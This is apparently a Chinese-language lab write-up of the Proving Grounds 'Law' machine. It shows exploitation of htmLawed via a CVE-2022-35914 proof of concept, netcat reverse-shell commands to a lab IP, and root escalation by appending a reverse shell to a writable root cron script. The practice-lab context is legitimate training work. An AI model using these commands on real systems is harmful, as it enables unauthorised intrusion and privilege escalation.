临渊羡鱼

退而结网

0%

Proving Grounds Practice - Law

Posted on In , ,
Proving Grounds Practice Lab中Law打靶过程记录

Difficulty

Medium

scan

1
2
3
4
5
[*] ssh found on tcp/22.
    OpenSSH 8.4p1

[*] http found on tcp/80.
    Apache/2.4.56

80 htmlLaw

版本:1.2.5

foothold

https://github.com/cosad3s/CVE-2022-35914-poc/blob/main/CVE-2022-35914.py

执行 python cve-2022-35914.py -u ``http://192.168.212.190`` -c "id" 后提示失败,查看代码修改默认uri为 /index.php,重新执行

1
2
3
4
5
6
7
8
9
10
def exploit(url,cmd,user_agent,check,hook):
    # uri = "/vendor/htmlawed/htmlawed/htmLawedTest.php"
    uri = "/index.php"
    headers = {'User-Agent': user_agent}

    session = requests.Session()
    response_part1 = session.get(str(url)+uri, verify=False, headers=headers)
    print(response_part1.text)
    if (response_part1.status_code != 200):
        fail()

重新执行成功得到返回

直接尝试nc 反弹shell: python cve-2022-35914.py -u ``http://192.168.212.190`` -c "nc 192.168.45.234 80 -e /bin/bash

1
2
3
4
5
6
rlwrap nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.212.190] 60626
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd

escalation

只有一个root账户

1
2
3
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...

上传linpeas执行,可能有用的信息

1
2
3
╔══════════╣ Sudo version
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version
Sudo version 1.9.5p2
1
2
3
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens
ptrace protection is disabled (0), so sudo tokens could be abused
1
2
3
╔══════════╣ .sh files in path
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path
/usr/bin/gettext.sh
1
2
3
4
5
6
7
8
9
10
11
╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#logrotate-exploitation
logrotate 3.18.0

    Default mail command:       /usr/bin/mail
    Default compress command:   /bin/gzip
    Default uncompress command: /bin/gunzip
    Default compress extension: .gz
    Default state file path:    /var/lib/logrotate/status
    ACL support:                yes
    SELinux support:            yes

试了sudo 提权,没有成功,其他也没有头绪,先用pspy检查一下有没有其他定时任务

https://github.com/DominicBreuker/pspy?tab=readme-ov-file

pspy可以在不需要root权限的情况下监控进程执行情况,尤其适用于检查进程执行时间短,使用ps -ef等命令无法查看到的场景。

监控到每分钟会以root用户执行 /var/www/clean.sh,查看clean.sh内容是清理apach日志,查看所属用户是当前用户www-data, 直接追加反弹shell命令

1
2
3
4
5
6
7
8
cat cleanup.sh
#!/bin/bash

rm -rf /var/log/apache2/error.log
rm -rf /var/log/apache2/access.log
ls -al cleanup.sh
-rwxr-xr-x 1 www-data www-data 82 Aug 25  2023 cleanup.sh
echo 'nc 192.168.45.234 80 -e /bin/bash' >> cleanup.sh

等待片刻,nc收到了root用户的反弹shell

1
2
3
4
5
rlwrap nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.212.190] 45784
id
uid=0(root) gid=0(root) groups=0(root)

反思

  1. 可能的提权点和漏洞比较多,先枚举列出来,从最有可能的开始,避免浪费太多时间,也避免有重要信息遗漏